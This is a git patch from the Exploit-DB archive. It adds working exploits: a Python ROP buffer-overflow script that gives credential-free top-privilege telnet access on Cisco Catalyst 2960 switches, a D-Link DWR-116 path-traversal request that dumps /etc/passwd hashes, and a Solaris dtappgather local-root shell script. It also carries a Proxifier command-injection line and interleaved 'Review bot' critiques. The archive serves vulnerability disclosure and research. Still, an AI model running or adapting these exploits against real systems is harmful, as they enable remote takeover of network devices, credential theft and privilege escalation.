From 2ac6fc17c20f615d7a7aa52335b76171bb0e1811 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 13 Apr 2017 05:01:16 +0000
Subject: [PATCH] DB: 2017-04-13

3 new exploits

Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation

Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution

D-Link DWR-116 / DWR-116A1 - Arbitrary File Download
---
 files.csv                            |  3 +
 platforms/hardware/remote/41872.py   | 83 ++++++++++++++++++++++++++++
 platforms/hardware/webapps/41840.txt | 36 ++++++++++++
 platforms/macos/local/41854.txt      |  1 +
 platforms/multiple/dos/41668.txt     |  2 +-
 platforms/multiple/dos/41669.txt     |  2 +-
 platforms/solaris/local/41871.sh     | 51 +++++++++++++++++
 7 files changed, 176 insertions(+), 2 deletions(-)
 create mode 100755 platforms/hardware/remote/41872.py
 create mode 100755 platforms/hardware/webapps/41840.txt
 create mode 100755 platforms/solaris/local/41871.sh

diff --git a/files.csv b/files.csv
index 761bccd8a..1ef791e52 100644
--- a/files.csv
+++ b/files.csv
@@ -8934,6 +8934,7 @@ id,file,description,date,author,platform,type,port
 41853,platforms/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,macos,local,0
 41854,platforms/macos/local/41854.txt,"Proxifier for Mac 2.17 / 2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",macos,local,0
 41870,platforms/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",multiple,local,0
+41871,platforms/solaris/local/41871.sh,"Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",solaris,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15436,6 +15437,7 @@ id,file,description,date,author,platform,type,port
 41850,platforms/windows/remote/41850.txt,"Moxa MXview 2.8 - Private Key Disclosure",2017-04-10,hyp3rlinx,windows,remote,0
 41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
 41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
+41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37722,6 +37724,7 @@ id,file,description,date,author,platform,type,port
 41837,platforms/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
 41838,platforms/php/webapps/41838.txt,"My Gaming Ladder Combo System 7.5 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
 41839,platforms/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41840,platforms/hardware/webapps/41840.txt,"D-Link DWR-116 / DWR-116A1 - Arbitrary File Download",2017-04-07,"Patryk Bogdan",hardware,webapps,0
 41841,platforms/php/webapps/41841.html,"WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting",2017-04-07,dxw,php,webapps,80
 41842,platforms/cgi/webapps/41842.txt,"QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection",2017-04-07,"Harry Sintonen",cgi,webapps,0
 41844,platforms/php/webapps/41844.html,"e107 CMS 2.1.4 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,0
diff --git a/platforms/hardware/remote/41872.py b/platforms/hardware/remote/41872.py
new file mode 100755
index 000000000..652285cfa
--- /dev/null
+++ b/platforms/hardware/remote/41872.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python
+# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow
+# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
+# Date: 04.10.2017
+# Exploit Author: https://twitter.com/artkond
+# Vendor Homepage: https://www.cisco.com/
+# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)
+# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11
+# CVE : CVE-2017-3881
+# Description:
+#
+# The exploit connects to the Catalyst switch and patches
+# it execution flow to allow credless telnet interaction 
+# with highest privilege level
+#
+
+
+import socket
+import sys
+from time import sleep
+
+set_credless = True
+
+if len(sys.argv) < 3:
+	print sys.argv[0] + ' [host] --set/--unset'
+	sys.exit()
+elif sys.argv[2] == '--unset':
+	set_credless = False
+elif sys.argv[2] == '--set':
+	pass
+else:
+	print sys.argv[0] + ' [host] --set/--unset'
+	sys.exit()
+
+
+s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
+s.connect((sys.argv[1], 23))
+
+print '[+] Connection OK'
+print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
+print '[+] Sending cluster option'
+print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
+
+
+
+payload = '\xff\xfa\x24\x00'
+payload += '\x03CISCO_KITS\x012:'
+payload += 'A' * 116
+payload += '\x00\x00\x37\xb4'		# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
+#next bytes are shown as offsets from r1
+payload += '\x02\x3d\x55\xdc'		# +8  address of pointer to is_cluster_mode function - 0x34
+if set_credless is True:
+	payload += '\x00\x00\x99\x9c'	# +12 set  address of func that rets 1
+else:
+	payload +=	'\x00\x04\xeA\xe0'	# unset 
+payload += 'BBBB'					# +16(+0) r1 points here at second gadget
+payload += '\x00\xe1\xa9\xf4' 		# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
+payload += 'CCCC'					# +8 
+payload += 'DDDD'					# +12
+payload += 'EEEE'					# +16(+0) r1 points here at third gadget
+payload += '\x00\x06\x7b\x5c'		# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; 
+payload += '\x02\x3d\x55\xc8'		# +8  r1+8 = 0x23d55c8
+payload += 'FFFF'					# +12 
+payload += 'GGGG'					# +16(+0) r1 points here at fourth gadget 
+payload += '\x00\x6c\xb3\xa0' 		# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
+if set_credless:
+	payload += '\x00\x27\x0b\x94'	# +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; 
+else:
+	payload += '\x00\x04\xe7\x78'	# unset
+payload += 'HHHH'					# +12
+payload += 'IIII'					# +16(+0) r1 points here at fifth gadget
+payload += '\x01\x4a\xcf\x98'		# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
+payload += 'JJJJ'					# +8 r1 points here at third gadget
+payload += 'KKKK'					# +12
+payload += 'LLLL'					# +16
+payload += '\x01\x14\xe7\xec'		# +20 original execution flow return addr
+payload += ':15:' +  '\xff\xf0'
+
+s.send(payload)
+
+print '[+] All done'
+
+s.close()
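Review bot: The comment on the fifth-gadget line names address 0x0148e560 while the bytes actually appended are `\x01\x4a\xcf\x98` (0x014acf98); the comment and the literal disagree and one of them should be corrected so a reader auditing the chain is not misled. The header's Version line has a stray closing parenthesis and should read `# Version: IOS version c2960-lanbasek9-mz.122-55.SE11`, and the status line at the top of the connection phase misspells "Received" in a runtime string. The script also prints `[+] All done` after a single unchecked `s.send(payload)` with no response read, so that message reports only that the send call returned, not that anything happened on the switch; the wording should say so, e.g. `print '[+] Payload sent (no confirmation is read back)'`. Since every address in the payload is taken from the single image named in the Tested-on line, a one-line header note such as `# NOTE: all addresses below are specific to c2960-lanbasek9-mz.122-55.SE11` would make that dependency explicit for readers of the header alone.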
diff --git a/platforms/hardware/webapps/41840.txt b/platforms/hardware/webapps/41840.txt
new file mode 100755
index 000000000..4df4dea54
--- /dev/null
+++ b/platforms/hardware/webapps/41840.txt
@@ -0,0 +1,36 @@
+# Title: D-Link DWR-116 Arbitrary File Download
+# Vendor: D-Link (www.dlink.com)
+# Affected model(s): DWR-116 / DWR-116A1
+# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
+# CVE: CVE-2017-6190
+# Date: 04.07.2016
+# Author: Patryk Bogdan (@patryk_bogdan)
+
+Description:
+D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
+which leads to unathorized file download from device filesystem.
+
+
+PoC:
+
+HTTP Request:
+GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 192.168.2.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+HTTP Response:
+HTTP/1.0 200 OK
+Content-Type: application/x-none
+Cache-Control: max-age=60
+Connection: close
+
+root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
+nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
+ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
+
+
+Fix:
+Update device to the new firmware (V1.05b09)
\ No newline at end of file
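Review bot: The header date `# Date: 04.07.2016` disagrees with the CVE year (CVE-2017-6190) and with the 2017-04-07 date this entry receives in files.csv in the same commit; presumably 2017 is intended and the line should read `# Date: 04.07.2017`. `unathorized` in the description is a typo for `unauthorized`. The file is also added without a trailing newline.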
diff --git a/platforms/macos/local/41854.txt b/platforms/macos/local/41854.txt
index 06dfd009e..6af933f9c 100755
--- a/platforms/macos/local/41854.txt
+++ b/platforms/macos/local/41854.txt
@@ -48,4 +48,5 @@ rm -f a.c
 /Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
 /tmp/a
 
+
 -------------------------------------------------------------------
\ No newline at end of file
diff --git a/platforms/multiple/dos/41668.txt b/platforms/multiple/dos/41668.txt
index 4244d034d..3bccb226c 100755
--- a/platforms/multiple/dos/41668.txt
+++ b/platforms/multiple/dos/41668.txt
@@ -5,7 +5,7 @@
 # Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
 # Version: 2.8
 # Tested on: Linux Debian / Windows 7
-# CVE : CVE-2017-6191
+# CVE : CVE-2017-6192
 
 
 Additional analysis:
diff --git a/platforms/multiple/dos/41669.txt b/platforms/multiple/dos/41669.txt
index b607ae23d..9133e7e02 100755
--- a/platforms/multiple/dos/41669.txt
+++ b/platforms/multiple/dos/41669.txt
@@ -5,7 +5,7 @@
 # Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
 # Version: 2.8
 # Tested on: Linux Debian / Windows 7
-# CVE : CVE-2017-6192
+# CVE : CVE-2017-6193
 
 Additional analysis:
 https://www.onvio.nl/nieuws/cve-2017-6192-apngdis-width-height-buffer-overflow
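Review bot: The CVE line is changed to CVE-2017-6193, but the "Additional analysis" link two lines below still carries the slug cve-2017-6192, which is the identifier the sibling file 41669.txt's neighbour 41668.txt now receives in this same commit; it is worth confirming the link belongs to this entry rather than to 41668 before the two files are considered consistent. If the URL is correct as an external reference, a short note next to it, e.g. `# (vendor write-up covers both ids)`, would stop readers from flagging it as a mismatch — that wording is a guess and should only be added once verified.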
diff --git a/platforms/solaris/local/41871.sh b/platforms/solaris/local/41871.sh
new file mode 100755
index 000000000..4707f55bf
--- /dev/null
+++ b/platforms/solaris/local/41871.sh
@@ -0,0 +1,51 @@
+#!/bin/ksh
+#Exploit PoC reverse engineered from EXTREMEPARR which provides
+#local root on Solaris 7 - 11 (x86 & SPARC). Uses a environment
+#variable of setuid binary dtappgather to manipulate file
+#permissions and create a user owned directory anywhere on the
+#system (as root). Can then add a shared object to locale folder
+#and run setuid binaries with an untrusted library file.
+#
+# e.g.
+# $ id;uname -a; ./dtappgather-poc.sh
+# uid=60001(nobody) gid=60001(nobody)
+# SunOS sparc 5.8 Generic_117350-39 sun4m sparc SUNW,SPARCstation-20
+# [+] '/usr/dt/bin/dtappgather' directory traversal exploit
+# [-] get rid of any of our desktop files
+# [-] exploiting the traversal bug...
+# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
+# MakeDirectory: /var/dt/appconfig/appmanager/..: File exists
+# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
+# [-] symlink attack create our directory
+# dr-xr-xr-x   2 nobody   nobody       512 Apr 11 14:40 pdkhax
+# [-] Done. "/usr/lib/locale/pdkhax" is writeable
+# $ 
+#
+# To get root privileges simply exploit "at" by adding a .so.2
+# file in the new locale directory and calling "at".
+#
+# $ at -f /etc/passwd 11:11
+# job 1491991860.a at Ons Apr 12 11:11:00 2017
+# $ LC_TIME=pdkhax at -l
+# # id
+# uid=0(root) gid=60001(nobody)
+# 
+# -- Hacker Fantastic (www.myhackerhouse.com)
+echo "[+] '/usr/dt/bin/dtappgather' directory traversal exploit"
+echo "[-] get rid of any of our desktop files"
+chmod -R 777 /var/dt/appconfig/appmanager/*
+rm -rf /var/dt/appconfig/appmanager/*
+echo [-] exploiting the traversal bug...
+DTUSERSESSION=. /usr/dt/bin/dtappgather
+DTUSERSESSION=. /usr/dt/bin/dtappgather
+DTUSERSESSION=.. /usr/dt/bin/dtappgather
+DTUSERSESSION=.. /usr/dt/bin/dtappgather
+DTUSERSESSION=.. /usr/dt/bin/dtappgather
+echo [-] symlink attack create our directory 
+ln -sf /usr/lib/locale /var/dt/appconfig/appmanager
+DTUSERSESSION=pdkhax /usr/dt/bin/dtappgather
+ls -al /usr/lib/locale | grep pdkhax
+rm -rf /var/dt/appconfig/appmanager
+chmod 755 /usr/lib/locale/pdkhax
+echo [-] Done. "/usr/lib/locale/pdkhax" is writeable
+
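Review bot: The final status line loses its double quotes to the shell, so the script prints `[-] Done. /usr/lib/locale/pdkhax is writeable` rather than the quoted form shown in the sample output in the header; writing it as `echo '[-] Done. "/usr/lib/locale/pdkhax" is writeable'` makes the two agree. The three unquoted `echo [-] ...` lines also pass `[-]` to the shell as a bracket glob, which is replaced by a filename if a file named `-` exists in the working directory, so each of those strings should be quoted. The "Done ... is writeable" message is printed unconditionally, regardless of what the `ls | grep` on the preceding line returned, so it does not actually report the outcome. From a defender's view, the artifacts this run leaves on disk are the ones the script itself names — the `appmanager` path it removes and the directory under `/usr/lib/locale` it does not — which is the observable footprint to look for when investigating a host.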